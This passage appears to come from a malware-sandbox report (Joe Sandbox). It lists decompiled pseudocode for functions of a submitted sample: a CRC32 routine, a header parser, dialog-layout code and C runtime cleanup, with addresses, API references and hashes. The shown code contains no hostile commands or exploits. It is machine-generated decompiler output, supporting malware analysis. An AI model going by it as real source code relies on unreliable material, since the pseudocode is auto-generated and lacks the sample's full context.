				if( *((intOrPtr*)(_t88 + 8)) != 0 ||  *_t88 <=  *((intOrPtr*)(__ecx + 0x84)) - 7 || E000747FB(__ecx) != 0) {
					E0006A7E4(_t88,  ~( *(_t88 + 4)) & 0x00000007);
					 *(_t91 + 0x18) = E0006A7FB(_t88) >> 8;
					E0006A7E4(_t88, 8);
					_t66 =  *(_t91 + 0x14) & 0x000000ff;
					_t39 = (_t66 >> 0x00000003 & 0x00000003) + 1;
					 *((intOrPtr*)(_t91 + 0x10)) = _t39;
					if(_t39 == 4) {
						goto L3;
					}
					_t86[3] = _t39 + 2;
					_t86[1] = (_t66 & 0x00000007) + 1;
					 *(_t91 + 0x20) = E0006A7FB(_t88) >> 8;
					E0006A7E4(_t88, 8);
					if( *((intOrPtr*)(_t91 + 0x10)) <= _t61) {
						L9:
						_t84 =  *(_t91 + 0x14);
						 *_t86 = _t61;
						if((_t61 >> 0x00000010 ^ _t61 >> 0x00000008 ^ _t61 ^ _t84 ^ 0x0000005a) !=  *((intOrPtr*)(_t91 + 0x1c))) {
							goto L3;
						}
						_t47 =  *_t88;
						_t86[2] = _t47;
						_t23 = _t47 - 1; // -1
						_t48 =  *((intOrPtr*)(_t89 + 0x88));
						_t78 = _t23 + _t61;
						if(_t48 >= _t78) {
							_t48 = _t78;
						}
						 *((intOrPtr*)(_t89 + 0x88)) = _t48;
						_t86[4] = _t84 >> 0x00000006 & 0x00000001;
						_t86[4] = _t84 >> 7;
						return 1;
					}
					_t87 =  *((intOrPtr*)(_t91 + 0x10));
					_t90 = _t61;
					do {
						_t55 = E0006A7FB(_t88) >> 8 << _t90;
						_t90 = _t90 + 8;
						_t61 = _t61 + _t55;
						_t82 =  *(_t88 + 4) + 8;
						 *_t88 =  *_t88 + (_t82 >> 3);
						 *(_t88 + 4) = _t82 & 0x00000007;
						_t87 = _t87 - 1;
					} while (_t87 != 0);
					_t86 =  *(_t91 + 0x28);
					_t89 =  *(_t91 + 0x18);
					goto L9;
				} else {
					L3:
					return 0;
				}
			}

0x000737c7
0x000737cb
0x000737ce
0x000737d2
0x000737d4
0x000737d8
0x000737de
0x00073808
0x0007381b
0x0007381f
0x00073828
0x00073833
0x00073834
0x0007383b
0x00000000
0x00000000
0x00073844
0x00073847
0x00073858
0x0007385c
0x00073865
0x000738a0
0x000738a0
0x000738b0
0x000738bd
0x00000000
0x00000000
0x000738c3
0x000738c5
0x000738c8
0x000738cb
0x000738d1
0x000738d5
0x000738d7
0x000738d7
0x000738d9
0x000738e9
0x000738ee
0x00000000
0x000738ee
0x00073867
0x0007386b
0x0007386d
0x00073879
0x0007387b
0x00073881
0x00073883
0x0007388e
0x00073890
0x00073893
0x00073893
0x00073898
0x0007389c
0x00000000
0x000737f6
0x000737f6
0x00000000
0x000737f6

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction ID: a78d0c2144d6a6107cde390ede45f077fedd78124a6fa2727649fd2b9af2820f
Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
Instruction Fuzzy Hash: 1B31E9B1B187464FD754DF28C8512AABBE1FB95300F10852DE499D7342C739EA49CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00065F3C Relevance: .1, Instructions: 76
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00065F3C(signed char _a4, signed char _a8, unsigned int _a12) {
				signed char _t49;
				signed char _t51;
				signed char _t67;
				signed char _t68;
				unsigned int _t72;
				unsigned int _t74;

				_t67 = _a8;
				_t49 = _a4;
				_t74 = _a12;
				if(_t74 != 0) {
					while((_t67 & 0x00000007) != 0) {
						_t49 = _t49 >> 0x00000008 ^  *(0x9eeb0 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_a8 = _t67;
						_t74 = _t74 - 1;
						if(_t74 != 0) {
							continue;
						}
						goto L3;
					}
				}
				L3:
				if(_t74 >= 8) {
					_t72 = _t74 >> 3;
					do {
						_t51 = _t49 ^  *_t67;
						_t74 = _t74 - 8;
						_t68 =  *(_t67 + 4);
						_t67 = _a8 + 8;
						_a8 = _t67;
						_t49 =  *(0x9eeb0 + (_t68 >> 0x18) * 4) ^  *(0x9f2b0 + (_t68 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x9f6b0 + (_t68 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9feb0 + (_t51 >> 0x18) * 4) ^  *(0xa02b0 + (_t51 >> 0x00000010 & 0x000000ff) * 4) ^  *(0xa06b0 + (_t51 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x9fab0 + (_t68 & 0x000000ff) * 4) ^  *(0xa0ab0 + (_t51 & 0x000000ff) * 4);
						_t72 = _t72 - 1;
					} while (_t72 != 0);
				}
				if(_t74 != 0) {
					do {
						_t49 = _t49 >> 0x00000008 ^  *(0x9eeb0 + ( *_t67 & 0x000000ff ^ _t49 & 0x000000ff) * 4);
						_t67 = _t67 + 1;
						_t74 = _t74 - 1;
					} while (_t74 != 0);
				}
				return _t49;
			}

0x00065f3f
0x00065f43
0x00065f47
0x00065f4c
0x00065f4e
0x00065f5e
0x00065f65
0x00065f66
0x00065f69
0x00065f6c
0x00000000
0x00000000
0x00000000
0x00065f6c
0x00065f4e
0x00065f6e
0x00065f71
0x00065f7a
0x00065f7d
0x00065f7d
0x00065f7f
0x00065f82
0x00065fdf
0x00065fe2
0x00065ff6
0x00065ff8
0x00065ff8
0x00065ffd
0x00066000
0x00066002
0x0006600d
0x00066014
0x00066015
0x00066015
0x00066002
0x0006601f

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec5d98b9d894de9ae043cfa6b451632333633ea113ee2988007aead4b90bdcc6
Instruction ID: 0877e9403c45844e35bdfc457965da98b8467acab8a29dc88ddfe413a0bcd8d7
Opcode Fuzzy Hash: ec5d98b9d894de9ae043cfa6b451632333633ea113ee2988007aead4b90bdcc6
Instruction Fuzzy Hash: EB219C72A205664BDB48CF2EDCD04767792A787312746813BEE46CB2D1C539ED25C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0006DA98 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0006DA98(struct HWND__* __ecx, void* __eflags, intOrPtr _a8, char _a12) {
				struct HWND__* _v8;
				short _v2048;
				char _v2208;
				char _v2288;
				signed int _v2292;
				char _v2300;
				intOrPtr _v2304;
				struct tagRECT _v2320;
				intOrPtr _v2324;
				intOrPtr _v2336;
				struct tagRECT _v2352;
				struct tagRECT _v2368;
				signed int _v2376;
				char _v2377;
				intOrPtr _v2384;
				intOrPtr _v2393;
				void* __ebx;
				void* __esi;
				signed int _t96;
				struct HWND__* _t107;
				signed int _t120;
				signed int _t135;
				void* _t151;
				void* _t156;
				char _t157;
				void* _t158;
				signed int _t159;
				intOrPtr _t161;
				void* _t164;
				void* _t170;
				long _t171;
				signed int _t175;
				signed int _t179;
				signed int _t186;
				struct HWND__* _t187;
				struct HWND__* _t188;
				void* _t189;
				void* _t192;
				signed int _t193;
				long _t194;
				void* _t201;
				int* _t202;
				struct HWND__* _t203;
				void* _t205;
				void* _t206;
				void* _t208;
				void* _t210;
				void* _t214;

				_t203 = __ecx;
				_v2368.bottom = __ecx;
				E0006400A( &_v2208, 0x50, L"$%s:", _a8);
				_t208 =  &_v2368 + 0x10;
				E00071596( &_v2208,  &_v2288, 0x50);
				_t96 = E00083630( &_v2300);
				_t187 = _v8;
				_t156 = 0;
				_v2376 = _t96;
				_t210 =  *0x9e5f4 - _t156; // 0x63
				if(_t210 <= 0) {
					L8:
					_t157 = E0006D0EE(_t156, _t203, _t189, _t214, _a8,  &(_v2368.right),  &(_v2368.top));
					_v2377 = _t157;
					GetWindowRect(_t187,  &_v2352);
					GetClientRect(_t187,  &(_v2320.top));
					_t170 = _v2352.right - _v2352.left + 1;
					_t179 = _v2320.bottom;
					_t192 = _v2352.bottom - _v2352.top + 1;
					_v2368.right = 0x64;
					_t205 = _t192 - _v2304;
					_v2368.bottom = _t170 - _t179;
					if(_t157 == 0) {
						L15:
						_t222 = _a12;
						if(_a12 == 0 && E0006D171(_t157, _v2368.bottom, _t222, _a8, L"CAPTION",  &_v2048, 0x400) != 0) {
							SetWindowTextW(_t187,  &_v2048);
						}
						L18:
						_t206 = _t205 - GetSystemMetrics(8);
						_t107 = GetWindow(_t187, 5);
						_t188 = _t107;
						_v2368.bottom = _t188;
						if(_t157 == 0) {
							L24:
							return _t107;
						}
						_t158 = 0;
						while(_t188 != 0) {
							__eflags = _t158 - 0x200;
							if(_t158 >= 0x200) {
								goto L24;
							}
							GetWindowRect(_t188,  &_v2320);
							_t171 = _v2320.top.left;
							_t193 = 0x64;
							asm("cdq");
							_t194 = _v2320.left;
							asm("cdq");
							_t120 = (_t171 - _t206 - _v2336) * _v2368.top;
							asm("cdq");
							_t175 = 0x64;
							asm("cdq");
							asm("cdq");
							 *0xc2150(_t188, 0, (_t194 - (_v2352.right - _t120 % _t175 >> 1) - _v2352.bottom) * _v2368.right / _t175, _t120 / _t175, (_v2320.right - _t194 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t171 + 1) * _v2368.top / _t193, 0x204);
							_t107 = GetWindow(_t188, 2);
							_t188 = _t107;
							__eflags = _t188 - _v2384;
							if(_t188 == _v2384) {
								goto L24;
							}
							_t158 = _t158 + 1;
							__eflags = _t158;
						}
						goto L24;
					}
					if(_a12 != 0) {
						goto L18;
					}
					_t159 = 0x64;
					asm("cdq");
					_t135 = _v2292 * _v2368.top;
					_t161 = _t179 * _v2368.right / _t159 + _v2352.right;
					_v2324 = _t161;
					asm("cdq");
					_t186 = _t135 % _v2352.top;
					_v2352.left = _t135 / _v2352.top + _t205;
					asm("cdq");
					asm("cdq");
					_t201 = (_t192 - _v2352.left - _t186 >> 1) + _v2336;
					_t164 = (_t170 - _t161 - _t186 >> 1) + _v2352.bottom;
					if(_t164 < 0) {
						_t164 = 0;
					}
					if(_t201 < 0) {
						_t201 = 0;
					}
					 *0xc2150(_t187, 0, _t164, _t201, _v2324, _v2352.left,  !(GetWindowLongW(_t187, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
					GetWindowRect(_t187,  &_v2368);
					_t157 = _v2393;
					goto L15;
				} else {
					_t202 = 0x9e154;
					do {
						if( *_t202 > 0) {
							_t9 =  &(_t202[1]); // 0x946b8
							_t151 = E00085EC0( &_v2288,  *_t9, _t96);
							_t208 = _t208 + 0xc;
							if(_t151 == 0) {
								_t12 =  &(_t202[1]); // 0x946b8
								if(E0006D2C8(_t156, _t203, _t202,  *_t12,  &_v2048, 0x400) != 0) {
									SetDlgItemTextW(_t187,  *_t202,  &_v2048);
								}
							}
							_t96 = _v2368.top;
						}
						_t156 = _t156 + 1;
						_t202 =  &(_t202[3]);
						_t214 = _t156 -  *0x9e5f4; // 0x63
					} while (_t214 < 0);
					goto L8;
				}
			}

0x0006dab0
0x0006daba
0x0006dabe
0x0006dac3
0x0006dad5
0x0006dadf
0x0006dae4
0x0006daeb
0x0006daee
0x0006daf2
0x0006daf8
0x0006db55
0x0006db6d
0x0006db75
0x0006db79
0x0006db85
0x0006db97
0x0006db9e
0x0006dba2
0x0006dba5
0x0006dbad
0x0006dbb3
0x0006dbb9
0x0006dc5c
0x0006dc5c
0x0006dc64
0x0006dc95
0x0006dc95
0x0006dc9b
0x0006dca6
0x0006dca8
0x0006dcae
0x0006dcb0
0x0006dcb6
0x0006dd68
0x0006dd68
0x0006dd68
0x0006dcbc
0x0006dd56
0x0006dcc3
0x0006dcc9
0x00000000
0x00000000
0x0006dcd5
0x0006dcdf
0x0006dcf4
0x0006dcf9
0x0006dcfc
0x0006dd12
0x0006dd1a
0x0006dd1c
0x0006dd1d
0x0006dd25
0x0006dd37
0x0006dd3e
0x0006dd47
0x0006dd4d
0x0006dd4f
0x0006dd53
0x00000000
0x00000000
0x0006dd55
0x0006dd55
0x0006dd55
0x00000000
0x0006dd56
0x0006dbc7
0x00000000
0x00000000
0x0006dbd4
0x0006dbd7
0x0006dbe0
0x0006dbe5
0x0006dbeb
0x0006dbef
0x0006dbf0
0x0006dbf6
0x0006dc00
0x0006dc07
0x0006dc10
0x0006dc14
0x0006dc18
0x0006dc1a
0x0006dc1a
0x0006dc1e
0x0006dc20
0x0006dc20
0x0006dc46
0x0006dc52
0x0006dc58
0x00000000
0x0006dafa
0x0006dafa
0x0006daff
0x0006db02
0x0006db05
0x0006db0d
0x0006db12
0x0006db17
0x0006db28
0x0006db32
0x0006db3f
0x0006db3f
0x0006db32
0x0006db45
0x0006db45
0x0006db49
0x0006db4a
0x0006db4d
0x0006db4d
0x00000000
0x0006daff

APIs

_swprintf.LIBCMT ref: 0006DABE

Part of subcall function 0006400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0006401D

Part of subcall function 00071596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,000A0EE8,00000200,0006D202,00000000,?,00000050,000A0EE8), ref: 000715B3

_strlen.LIBCMT ref: 0006DADF
SetDlgItemTextW.USER32(?,0009E154,?), ref: 0006DB3F
GetWindowRect.USER32(?,?), ref: 0006DB79
GetClientRect.USER32(?,?), ref: 0006DB85
GetWindowLongW.USER32(?,000000F0), ref: 0006DC25
GetWindowRect.USER32(?,?), ref: 0006DC52
SetWindowTextW.USER32(?,?), ref: 0006DC95
GetSystemMetrics.USER32(00000008), ref: 0006DC9D
GetWindow.USER32(?,00000005), ref: 0006DCA8
GetWindowRect.USER32(00000000,?), ref: 0006DCD5
GetWindow.USER32(00000000,00000002), ref: 0006DD47

Strings

d, xrefs: 0006DBA5
CAPTION, xrefs: 0006DC77
$%s:, xrefs: 0006DAB2
T, xrefs: 0006DAFA

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$T$d
API String ID: 2407758923-3372899737
Opcode ID: 5a7b247b5e807ef58a082b37d87f7ff3da7e4d86e77c9359dd514a0252e316d3
Instruction ID: b8d22e8c36aadd54d9da8911c61e5cdc914c3367b4f8406f41e43b5aaaacd47e
Opcode Fuzzy Hash: 5a7b247b5e807ef58a082b37d87f7ff3da7e4d86e77c9359dd514a0252e316d3
Instruction Fuzzy Hash: CB81A071608301AFD710DF68CD88E6BBBEAEBC8714F04091EFA84D7251D674E905CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0008C233 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0008C233(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t2 = _t74 + 0x88; // 0x720043
				_t25 =  *_t2;
				if(_t25 != 0 && _t25 != 0x9ed50) {
					_t3 = _t74 + 0x7c; // 0x654d7463
					_t45 =  *_t3;
					if(_t45 != 0 &&  *_t45 == 0) {
						_t4 = _t74 + 0x84; // 0x0
						_t46 =  *_t4;
						if(_t46 != 0 &&  *_t46 == 0) {
							E000884DE(_t46);
							_t5 = _t74 + 0x88; // 0x720043
							E0008BE12( *_t5);
						}
						_t6 = _t74 + 0x80; // 0x79726f6d
						_t47 =  *_t6;
						if(_t47 != 0 &&  *_t47 == 0) {
							E000884DE(_t47);
							_t7 = _t74 + 0x88; // 0x720043
							E0008BF10( *_t7);
						}
						_t8 = _t74 + 0x7c; // 0x654d7463
						E000884DE( *_t8);
						_t9 = _t74 + 0x88; // 0x720043
						E000884DE( *_t9);
					}
				}
				_t10 = _t74 + 0x8c; // 0x700079
				_t26 =  *_t10;
				if(_t26 != 0 &&  *_t26 == 0) {
					_t11 = _t74 + 0x90; // 0x500074
					E000884DE( *_t11 - 0xfe);
					_t12 = _t74 + 0x94; // 0x6f0072
					E000884DE( *_t12 - 0x80);
					_t13 = _t74 + 0x98; // 0x650074
					E000884DE( *_t13 - 0x80);
					_t14 = _t74 + 0x8c; // 0x700079
					E000884DE( *_t14);
				}
				_t15 = _t74 + 0x9c; // 0x740063
				E0008C3A6( *_t15);
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0x939f8
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x93980
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x9e818) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E000884DE(_t31);
							E000884DE( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0x0
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E000884DE(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E000884DE(_t74);
			}

0x0008c23b
0x0008c23f
0x0008c23f
0x0008c247
0x0008c250
0x0008c250
0x0008c255
0x0008c25c
0x0008c25c
0x0008c264
0x0008c26c
0x0008c271
0x0008c277
0x0008c27d
0x0008c27e
0x0008c27e
0x0008c286
0x0008c28e
0x0008c293
0x0008c299
0x0008c29f
0x0008c2a0
0x0008c2a3
0x0008c2a8
0x0008c2ae
0x0008c2b4
0x0008c255
0x0008c2b5
0x0008c2b5
0x0008c2bd
0x0008c2c4
0x0008c2d0
0x0008c2d5
0x0008c2e3
0x0008c2e8
0x0008c2f1
0x0008c2f6
0x0008c2fc
0x0008c301
0x0008c304
0x0008c30a
0x0008c312
0x0008c313
0x0008c313
0x0008c319
0x0008c31c
0x0008c31c
0x0008c31f
0x0008c326
0x0008c328
0x0008c32c
0x0008c334
0x0008c33b
0x0008c341
0x0008c342
0x0008c342
0x0008c349
0x0008c34b
0x0008c34b
0x0008c350
0x0008c358
0x0008c35d
0x0008c35e
0x0008c35e
0x0008c361
0x0008c364
0x0008c367
0x0008c36a
0x0008c36a
0x0008c37c

APIs

___free_lconv_mon.LIBCMT ref: 0008C277

Part of subcall function 0008BE12: _free.LIBCMT ref: 0008BE2F
Part of subcall function 0008BE12: _free.LIBCMT ref: 0008BE41
Part of subcall function 0008BE12: _free.LIBCMT ref: 0008BE53
Part of subcall function 0008BE12: _free.LIBCMT ref: 0008BE65
Part of subcall function 0008BE12: _free.LIBCMT ref: 0008BE77
Part of subcall function 0008BE12: _free.LIBCMT ref: 0008BE89
Part of subcall function 0008BE12: _free.LIBCMT ref: 0008BE9B
Part of subcall function 0008BE12: _free.LIBCMT ref: 0008BEAD
Part of subcall function 0008BE12: _free.LIBCMT ref: 0008BEBF
Part of subcall function 0008BE12: _free.LIBCMT ref: 0008BED1
Part of subcall function 0008BE12: _free.LIBCMT ref: 0008BEE3
Part of subcall function 0008BE12: _free.LIBCMT ref: 0008BEF5
Part of subcall function 0008BE12: _free.LIBCMT ref: 0008BF07

_free.LIBCMT ref: 0008C26C

Part of subcall function 000884DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0008BFA7,00093958,00000000,00093958,00000000,?,0008BFCE,00093958,00000007,00093958,?,0008C3CB,00093958), ref: 000884F4
Part of subcall function 000884DE: GetLastError.KERNEL32(00093958,?,0008BFA7,00093958,00000000,00093958,00000000,?,0008BFCE,00093958,00000007,00093958,?,0008C3CB,00093958,00093958), ref: 00088506

_free.LIBCMT ref: 0008C28E
_free.LIBCMT ref: 0008C2A3
_free.LIBCMT ref: 0008C2AE
_free.LIBCMT ref: 0008C2D0
_free.LIBCMT ref: 0008C2E3
_free.LIBCMT ref: 0008C2F1
_free.LIBCMT ref: 0008C2FC
_free.LIBCMT ref: 0008C334
_free.LIBCMT ref: 0008C33B
_free.LIBCMT ref: 0008C358
_free.LIBCMT ref: 0008C370

Strings

P, xrefs: 0008C249

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: P
API String ID: 161543041-2526591172
Opcode ID: 49d7049e2a0e35b0b3db725a6719e480e5aa07475431969551d8ecedbf25c966
Instruction ID: d94f3440a3789db9ae300dfb8b33d4fd219b922bfd05c455f369d8d994229e1f
Opcode Fuzzy Hash: 49d7049e2a0e35b0b3db725a6719e480e5aa07475431969551d8ecedbf25c966
Instruction Fuzzy Hash: E93158326006059FEB60BA78D945F9A73F9BF00320F54C42AF4C9D7592DF31AD819B60

Uniqueness

Uniqueness Score: -1.00%

Function 0007CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0007CD2E(void* __ecx, void* __edx, void* __eflags, void* __fp0, short _a24, struct HWND__* _a4124) {
				void _v0;
				intOrPtr _v4;
				intOrPtr _v12;
				struct HWND__* _t8;
				void* _t18;
				void* _t25;
				void* _t27;
				void* _t29;
				struct HWND__* _t32;
				struct HWND__* _t35;
				void* _t48;

				_t48 = __fp0;
				_t27 = __edx;
				E0007E360();
				_t8 = E00079D1A(__eflags);
				if(_t8 == 0) {
					L12:
					return _t8;
				}
				_t8 = GetWindow(_a4124, 5);
				_t32 = _t8;
				_t29 = 0;
				_t35 = _t32;
				if(_t32 == 0) {
					L11:
					goto L12;
				}
				while(_t29 < 0x200) {
					GetClassNameW(_t32,  &_a24, 0x800);
					if(E000717AC( &_a24, L"STATIC") == 0 && (GetWindowLongW(_t32, 0xfffffff0) & 0x0000001f) == 0xe) {
						_t25 = SendMessageW(_t32, 0x173, 0, 0);
						if(_t25 != 0) {
							GetObjectW(_t25, 0x18,  &_v0);
							_t18 = E00079D5A(_v4);
							SendMessageW(_t32, 0x172, 0, E00079F5D(_t27, _t48, _t25, E00079D39(_v12), _t18));
							DeleteObject(_t25);
						}
					}
					_t8 = GetWindow(_t32, 2);
					_t32 = _t8;
					if(_t32 != _t35) {
						_t29 = _t29 + 1;
						if(_t32 != 0) {
							continue;
						}
					}
					break;
				}
				goto L11;
			}

0x0007cd2e
0x0007cd2e
0x0007cd33
0x0007cd38
0x0007cd3f
0x0007ce16
0x0007ce1c
0x0007ce1c
0x0007cd51
0x0007cd57
0x0007cd59
0x0007cd5b
0x0007cd5f
0x0007ce13
0x00000000
0x0007ce15
0x0007cd66
0x0007cd7d
0x0007cd94
0x0007cdb6
0x0007cdba
0x0007cdc4
0x0007cdce
0x0007cded
0x0007cdf4
0x0007cdf4
0x0007cdba
0x0007cdfd
0x0007ce03
0x0007ce07
0x0007ce09
0x0007ce0c
0x00000000
0x00000000
0x0007ce0c
0x00000000
0x0007ce07
0x00000000

APIs

GetWindow.USER32(?,00000005), ref: 0007CD51
GetClassNameW.USER32(00000000,?,00000800), ref: 0007CD7D

Part of subcall function 000717AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0006BB05,00000000,.exe,?,?,00000800,?,?,000785DF,?), ref: 000717C2

GetWindowLongW.USER32(00000000,000000F0), ref: 0007CD99
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0007CDB0
GetObjectW.GDI32(00000000,00000018,?), ref: 0007CDC4
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0007CDED
DeleteObject.GDI32(00000000), ref: 0007CDF4
GetWindow.USER32(00000000,00000002), ref: 0007CDFD

Strings

STATIC, xrefs: 0007CD83

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 0acc802fd6e6a87f962b01f957288ad32e673d2b17a592dfd7cc070a52501aa2
Instruction ID: c90fce52eb555f1d3a6e04bb47fb55740184bca8b04943545030de84cffa688d
Opcode Fuzzy Hash: 0acc802fd6e6a87f962b01f957288ad32e673d2b17a592dfd7cc070a52501aa2
Instruction Fuzzy Hash: B7112732940310BBF230AB609C09FDF379CAF54740F04C429FA4AA50A3CA7C8D1586A8

Uniqueness

Uniqueness Score: -1.00%

Function 00088EB1 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00088EB1(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x95ed0) {
					E000884DE(_t52);
					_t26 = _a4;
				}
				E000884DE( *((intOrPtr*)(_t26 + 0x3c)));
				E000884DE( *((intOrPtr*)(_a4 + 0x30)));
				E000884DE( *((intOrPtr*)(_a4 + 0x34)));
				E000884DE( *((intOrPtr*)(_a4 + 0x38)));
				E000884DE( *((intOrPtr*)(_a4 + 0x28)));
				E000884DE( *((intOrPtr*)(_a4 + 0x2c)));
				E000884DE( *((intOrPtr*)(_a4 + 0x40)));
				E000884DE( *((intOrPtr*)(_a4 + 0x44)));
				E000884DE( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00088D76(5,  &_v8);
				_v8 =  &_a4;
				return E00088DC6(4,  &_v8);
			}

0x00088eb7
0x00088eba
0x00088ec2
0x00088ec5
0x00088eca
0x00088ecd
0x00088ed1
0x00088edc
0x00088ee7
0x00088ef2
0x00088efd
0x00088f08
0x00088f13
0x00088f1e
0x00088f2c
0x00088f34
0x00088f3d
0x00088f45
0x00088f59

APIs

_free.LIBCMT ref: 00088EC5

